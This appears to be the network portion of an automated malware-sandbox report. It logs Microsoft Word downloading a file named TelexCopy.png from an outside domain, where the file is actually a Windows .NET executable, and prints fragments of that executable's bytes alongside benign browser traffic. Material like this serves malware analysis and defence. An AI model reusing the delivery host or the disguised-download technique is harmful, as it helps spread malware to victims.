May 31, 2023 17:08:33.020651102 CEST	8.8.8.8	192.168.2.22	0xd364	No error (0)	adobetarget.data.adobedc.net		66.235.152.107	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:33.020651102 CEST	8.8.8.8	192.168.2.22	0xd364	No error (0)	adobetarget.data.adobedc.net		66.235.152.143	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:33.020651102 CEST	8.8.8.8	192.168.2.22	0xd364	No error (0)	adobetarget.data.adobedc.net		66.235.152.113	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:33.020651102 CEST	8.8.8.8	192.168.2.22	0xd364	No error (0)	adobetarget.data.adobedc.net		66.235.152.152	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:33.020651102 CEST	8.8.8.8	192.168.2.22	0xd364	No error (0)	adobetarget.data.adobedc.net		66.235.152.115	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:33.020651102 CEST	8.8.8.8	192.168.2.22	0xd364	No error (0)	adobetarget.data.adobedc.net		66.235.152.126	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:33.035693884 CEST	8.8.8.8	192.168.2.22	0x8260	No error (0)	microsoftmscompoc.tt.omtrdc.net	adobetarget.data.adobedc.net		CNAME (Canonical name)	IN (0x0001)	false
May 31, 2023 17:08:33.035693884 CEST	8.8.8.8	192.168.2.22	0x8260	No error (0)	adobetarget.data.adobedc.net		66.235.152.152	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:33.035693884 CEST	8.8.8.8	192.168.2.22	0x8260	No error (0)	adobetarget.data.adobedc.net		66.235.152.115	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:33.035693884 CEST	8.8.8.8	192.168.2.22	0x8260	No error (0)	adobetarget.data.adobedc.net		66.235.152.126	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:33.035693884 CEST	8.8.8.8	192.168.2.22	0x8260	No error (0)	adobetarget.data.adobedc.net		66.235.152.107	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:33.035693884 CEST	8.8.8.8	192.168.2.22	0x8260	No error (0)	adobetarget.data.adobedc.net		66.235.152.143	A (IP address)	IN (0x0001)	false
May 31, 2023 17:08:33.035693884 CEST	8.8.8.8	192.168.2.22	0x8260	No error (0)	adobetarget.data.adobedc.net		66.235.152.113	A (IP address)	IN (0x0001)	false
May 31, 2023 17:09:00.640897036 CEST	8.8.8.8	192.168.2.22	0xb1a9	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

clients2.google.com

accounts.google.com

https:

js.monitor.azure.com

wcpstatic.microsoft.com

topvaluationfirms.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49189	142.250.203.110	443	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49188	142.250.203.109	443	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49198	13.107.237.60	443	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49199	13.107.237.60	443	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49226	142.250.203.110	443	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49235	13.107.237.60	443	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.22	49183	188.114.96.7	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
May 31, 2023 17:08:22.922101021 CEST	0	OUT	GET /TelexCopy.png HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: topvaluationfirms.com Connection: Keep-Alive
May 31, 2023 17:08:22.951797962 CEST	2	IN	HTTP/1.1 200 OK Date: Wed, 31 May 2023 15:08:22 GMT Content-Type: image/png Content-Length: 329216 Connection: keep-alive Last-Modified: Wed, 31 May 2023 01:50:18 GMT ETag: "6476a7da-50600" Cache-Control: public, max-age=31536000 Vary: Accept-Encoding Access-Control-Allow-Origin: * CF-Cache-Status: HIT Age: 46480 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=s9mz2FnYC%2FRu3o5uEqWV5A0Eh8G4IdIueQOHMgZi1UaiJlHSqs1%2BR6CE69aNU31A8KgtPqYrrH02E00Y5mKwZt0t9S21q48bJAPvcUdWhM2Q1Wp53DtOqFWojSHsiAcuxYoxae6JjUg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7d0021c34c3f18bd-FRA alt-svc: h3=":443"; ma=86400 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 85 78 76 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fa 04 00 00 0a 00 00 00 00 00 00 0e 18 05 00 00 20 00 00 00 20 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 17 05 00 57 00 00 00 00 20 05 00 1a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 f8 04 00 00 20 00 00 00 fa 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 1a 06 00 00 00 20 05 00 00 08 00 00 00 fc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 05 00 00 02 00 00 00 04 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 17 05 00 00 00 00 00 48 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELxvd0 @ ``W @ H.text `.rsrc @@.reloc@@BH
May 31, 2023 17:08:22.951834917 CEST	3	IN	Data Raw: 02 00 05 00 d0 b1 04 00 e4 65 00 00 03 00 00 00 0b 00 00 06 9c a5 00 00 32 0c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 02 14 7d 01 00 00 04 02 28 14 00 00 0a Data Ascii: e2^}((s}(rpo^}((*^}((}rTpsj}}((&(V(krL
May 31, 2023 17:08:22.951853037 CEST	4	IN	Data Raw: 33 00 00 0a 0a 73 34 00 00 0a 0b 07 28 35 00 00 0a 03 6f 36 00 00 0a 6f 37 00 00 0a 0c 06 08 6f 38 00 00 0a 00 06 18 6f 39 00 00 0a 00 06 6f 3a 00 00 0a 02 16 02 8e 69 6f 3b 00 00 0a 0d 09 13 04 2b 00 11 04 2a 13 30 01 00 0f 00 00 00 04 00 00 11 Data Ascii: 3s4(5o6o7o8o9o:io;+0s:o<&0+,{+,{o(*0-s=}s>}s?}s@}s?}(A{oB
May 31, 2023 17:08:22.951865911 CEST	6	IN	Data Raw: 0a 00 2a 00 13 30 06 00 ae 01 00 00 00 00 00 00 00 02 73 3d 00 00 0a 7d 16 00 00 04 02 73 5f 00 00 0a 7d 17 00 00 04 02 28 41 00 00 0a 00 02 7b 16 00 00 04 17 6f 42 00 00 0a 00 02 7b 16 00 00 04 72 d8 01 00 70 22 00 00 30 41 16 19 20 de 00 00 00 Data Ascii: *0s=}s_}(A{oB{rp"0A s`oa{SsCoD{rpoE{_sFoG{oH{rpo{0sCoD{2ob{r poE{
May 31, 2023 17:08:22.951879025 CEST	7	IN	Data Raw: 78 00 00 0a 00 06 17 58 0a 02 7b 28 00 00 04 6f 75 00 00 0a 06 6f 76 00 00 0a 72 a1 04 00 70 6f 77 00 00 0a 00 02 7b 28 00 00 04 6f 75 00 00 0a 06 6f 76 00 00 0a 1f 64 6f 78 00 00 0a 00 72 af 04 00 70 02 7b 23 00 00 04 6f 28 00 00 0a 72 13 05 00 Data Ascii: xX{(ouovrpow{(ouovdoxrp{#o(rp(y{szo{8{(or%rpo\|o}%rapo\|o}%rupo\|o}%rpo\|o}%rpo\|o}%rpo\|o}
May 31, 2023 17:08:22.951900005 CEST	8	IN	Data Raw: 08 00 00 01 13 30 05 00 aa 00 00 00 0b 00 00 11 00 02 7b 22 00 00 04 6f 28 00 00 0a 6f 6f 00 00 0a 72 d6 01 00 70 28 70 00 00 0a 0a 06 2c 17 00 72 b6 06 00 70 72 4d 03 00 70 16 1f 10 16 28 71 00 00 0a 26 2b 73 72 66 08 00 70 02 7b 22 00 00 04 6f Data Ascii: 0{"o(oorp(p,rprMp(q&+srfp{"o(([r p (,Jrp{"o(rp(y{szo&rp(&((0sUo<&0+,{+
May 31, 2023 17:08:22.951920033 CEST	9	IN	Data Raw: 00 04 1f 70 1f 14 73 46 00 00 0a 6f 47 00 00 0a 00 02 7b 23 00 00 04 1d 6f 48 00 00 0a 00 02 7b 24 00 00 04 28 8c 00 00 0a 6f 66 00 00 0a 00 02 7b 24 00 00 04 20 fe 01 00 00 1f 16 73 43 00 00 0a 6f 44 00 00 0a 00 02 7b 24 00 00 04 72 28 0a 00 70 Data Ascii: psFoG{#oH{$(of{$ sCoD{$r(poE{$ sFoG{$oH{%(of{% <sCoD{%rLpoE{% sFoG{%oH{&(of{&
May 31, 2023 17:08:22.951941967 CEST	11	IN	Data Raw: 00 00 04 02 fe 06 1a 00 00 06 73 4b 00 00 0a 6f 4c 00 00 0a 00 02 22 00 00 c0 40 22 00 00 50 41 73 51 00 00 0a 28 52 00 00 0a 00 02 17 28 18 00 00 0a 00 02 20 1b 03 00 00 20 f7 01 00 00 73 46 00 00 0a 28 53 00 00 0a 00 02 28 54 00 00 0a 02 7b 2d Data Ascii: sKoL"@"PAsQ(R( sF(S(T{-oU(T{,oU(T{+oU(T{*oU(T{)oU(T{(oU(T{'oU(T{&oU(T{%oU(T{
May 31, 2023 17:08:22.951967001 CEST	12	IN	Data Raw: 0a 72 a0 0c 00 70 6f 77 00 00 0a 00 02 7b 3b 00 00 04 6f 75 00 00 0a 06 6f 76 00 00 0a 20 96 00 00 00 6f 78 00 00 0a 00 06 17 58 0a 02 7b 3b 00 00 04 6f 75 00 00 0a 06 6f 76 00 00 0a 72 c2 0c 00 70 6f 77 00 00 0a 00 02 7b 3b 00 00 04 6f 75 00 00 Data Ascii: rpow{;ouov oxX{;ouovrpow{;ouov oxrp{6o(rp(p,rp+rp{6o(rp(y{/szo{+x{;or%rpo\|o}%rapo\|
May 31, 2023 17:08:22.951989889 CEST	14	IN	Data Raw: 20 28 84 00 00 0a 1c fe 01 0d 09 39 ae 00 00 00 00 1f 0b 8d 52 00 00 01 25 16 72 9b 0e 00 70 a2 25 17 02 7b 36 00 00 04 6f 28 00 00 0a a2 25 18 72 82 07 00 70 a2 25 19 02 7b 38 00 00 04 6f 28 00 00 0a a2 25 1a 72 f9 0e 00 70 a2 25 1b 02 7b 39 00 Data Ascii: (9R%rp%{6o(%rp%{8o(%rp%{9o(%r#p%{:o(%rAp%%r@p({/szo&rDp(&("(!*0{7o(rp{Ao((yoo
May 31, 2023 17:08:22.952649117 CEST	15	IN	Data Raw: 00 00 0a 00 02 7b 35 00 00 04 1a 6f 48 00 00 0a 00 02 7b 35 00 00 04 72 c2 0c 00 70 6f 19 00 00 0a 00 02 7b 36 00 00 04 28 99 00 00 0a 6f 66 00 00 0a 00 02 7b 36 00 00 04 1f 77 1f 0e 73 43 00 00 0a 6f 44 00 00 0a 00 02 7b 36 00 00 04 72 f0 00 00 Data Ascii: {5oH{5rpo{6(of{6wsCoD{6rpoE{6oI{6xsFoG{6oH{7(of{7w/sCoD{7rpoE{7oI{7<sFoG{7oH{8

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49189	142.250.203.110	443	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-05-31 15:08:30 UTC	0	OUT	GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=84.0.4147.135&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1 Host: clients2.google.com Connection: keep-alive X-Goog-Update-Interactivity: fg X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfm X-Goog-Update-Updater: chromecrx-84.0.4147.135 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-05-31 15:08:30 UTC	1	IN	HTTP/1.1 200 OK Content-Security-Policy: script-src 'report-sample' 'nonce-_3x2D4ZWSK-nPgDAv514aw' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 31 May 2023 15:08:30 GMT Content-Type: text/xml; charset=UTF-8 X-Daynum: 5994 X-Daystart: 29310 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2023-05-31 15:08:30 UTC	2	IN	Data Raw: 33 31 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 39 39 34 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 32 39 33 31 30 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22 Data Ascii: 31a<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5994" elapsed_seconds="29310"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
2023-05-31 15:08:30 UTC	2	IN	Data Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 70 6b 65 64 63 6a 6b 64 65 66 67 70 64 65 6c 70 62 63 6d 62 6d 65 6f 6d 63 6a 62 65 65 6d 66 6d 22 20 73 74 61 74 75 73 3d 22 65 72 72 6f 72 2d 75 6e 6b 6e 6f 77 6e Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app><app appid="pkedcjkdefgpdelpbcmbmeomcjbeemfm" status="error-unknown
2023-05-31 15:08:30 UTC	2	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49188	142.250.203.109	443	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-05-31 15:08:30 UTC	0	OUT	POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1 Host: accounts.google.com Connection: keep-alive Content-Length: 1 Origin: https://www.google.com Content-Type: application/x-www-form-urlencoded Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: CONSENT=WP.289365
2023-05-31 15:08:30 UTC	1	OUT	Data Raw: 20 Data Ascii:
2023-05-31 15:08:30 UTC	2	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Access-Control-Allow-Origin: https://www.google.com Access-Control-Allow-Credentials: true X-Content-Type-Options: nosniff Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 31 May 2023 15:08:30 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factor=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-EjlOfnTRRLbSwqa644oxVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2023-05-31 15:08:30 UTC	4	IN	Data Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a Data Ascii: 11["gaia.l.a.r",[]]
2023-05-31 15:08:30 UTC	4	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49198	13.107.237.60	443	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-05-31 15:08:31 UTC	4	OUT	GET /scripts/c/ms.jsll-3.min.js HTTP/1.1 Host: js.monitor.azure.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=TelexCopy.png&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-05-31 15:08:31 UTC	5	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=1800, immutable, no-transform Content-Length: 183646 Content-Type: text/javascript; charset=utf-8 Content-MD5: /marBaXljvDfmTXcxJKiCA== Last-Modified: Tue, 16 May 2023 17:35:05 GMT ETag: 0x8DB5633E2D59C23 X-Cache: TCP_HIT x-ms-request-id: 426e9ea2-101e-00d7-0fd0-937de3000000 x-ms-version: 2009-09-19 x-ms-meta-jssdkver: 3.2.11 x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-3.2.11.min.js Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * X-Azure-Ref-OriginShield: 05mB3ZAAAAADMs3AlBGSIR5H7WIdREhu8RlJBMjMxMDUwNDE4MDIzAGYxY2E3M2Q0LTg4ODMtNGNhZi1hYmRjLWZlMmQ1NjdhZmI5Ng== X-Azure-Ref: 072J3ZAAAAABasY5wHImDT4P3Awm8p1/cRlJBMzFFREdFMDkxNwBmMWNhNzNkNC04ODgzLTRjYWYtYWJkYy1mZTJkNTY3YWZiOTY= Date: Wed, 31 May 2023 15:08:31 GMT Connection: close
2023-05-31 15:08:31 UTC	6	IN	Data Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 33 2e 32 2e 31 31 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 76 61 72 20 65 3d 74 68 69 73 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 66 3d 22 66 75 6e 63 74 69 6f 6e 22 2c 64 3d 22 6f 62 6a 65 63 74 22 2c 66 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 2c 7a 3d 22 70 72 6f 74 6f 74 79 70 65 22 2c 67 3d 22 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 22 2c 6d 3d 4f 62 6a 65 63 74 2c 79 3d 6d 5b 7a Data Ascii: /! 1DS JSLL SKU, 3.2.11 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */var e=this,t=function(l){"use strict";var f="function",d="object",fe="undefined",z="prototype",g="hasOwnProperty",m=Object,y=m[z
2023-05-31 15:08:31 UTC	38	IN	Data Raw: 6c 65 64 22 2c 61 69 3d 22 64 69 73 61 62 6c 65 43 6f 6f 6b 69 65 73 55 73 61 67 65 22 2c 6f 69 3d 22 5f 63 6b 4d 67 72 22 2c 73 69 3d 6e 75 6c 6c 2c 63 69 3d 6e 75 6c 6c 2c 75 69 3d 6e 75 6c 6c 2c 6c 69 3d 6f 65 28 29 2c 66 69 3d 7b 7d 2c 64 69 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 70 69 28 65 29 7b 72 65 74 75 72 6e 21 65 7c 7c 65 2e 69 73 45 6e 61 62 6c 65 64 28 29 7d 66 75 6e 63 74 69 6f 6e 20 67 69 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 26 26 65 26 26 46 28 65 2e 69 67 6e 6f 72 65 43 6f 6f 6b 69 65 73 29 26 26 2d 31 21 3d 3d 65 2e 69 67 6e 6f 72 65 43 6f 6f 6b 69 65 73 5b 6b 5d 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 76 69 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3b 72 65 74 75 72 6e 20 65 3f 6e 3d 65 2e 67 65 74 43 6f 6f 6b 69 65 4d 67 72 28 29 3a Data Ascii: led",ai="disableCookiesUsage",oi="_ckMgr",si=null,ci=null,ui=null,li=oe(),fi={},di={};function pi(e){return!e\|\|e.isEnabled()}function gi(e,t){return t&&e&&F(e.ignoreCookies)&&-1!==e.ignoreCookies[k](t)}function vi(e,t){var n,r;return e?n=e.getCookieMgr():
2023-05-31 15:08:31 UTC	54	IN	Data Raw: 2e 71 75 65 75 65 29 7d 29 2c 4a 74 28 74 29 7d 2c 76 2e 74 72 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 4b 65 79 3d 65 2e 69 4b 65 79 7c 7c 43 5b 6d 65 5d 2c 65 5b 43 65 5d 3d 65 5b 43 65 5d 7c 7c 7a 74 28 6e 65 77 20 44 61 74 65 29 2c 65 2e 76 65 72 3d 65 2e 76 65 72 7c 7c 22 34 2e 30 22 2c 21 4e 26 26 76 5b 76 65 5d 28 29 3f 6d 28 29 5b 56 5d 28 65 29 3a 72 5b 4c 5d 28 65 29 7d 2c 76 5b 62 65 5d 3d 6d 2c 76 5b 70 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 69 7c 7c 28 69 3d 71 28 28 28 65 3d 7b 7d 29 5b 54 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 7d 2c 65 5b 49 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 7d 2c 65 5b 72 74 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 7d 2c 65 5b 69 74 5d 3d 66 75 6e Data Ascii: .queue)}),Jt(t)},v.track=function(e){e.iKey=e.iKey\|\|C[me],e[Ce]=e[Ce]\|\|zt(new Date),e.ver=e.ver\|\|"4.0",!N&&v[ve]()?m()[V](e):r[L](e)},v[be]=m,v[pe]=function(){var e;return i\|\|(i=q(((e={})[Te]=function(e){},e[Ie]=function(e){},e[rt]=function(e){},e[it]=fun
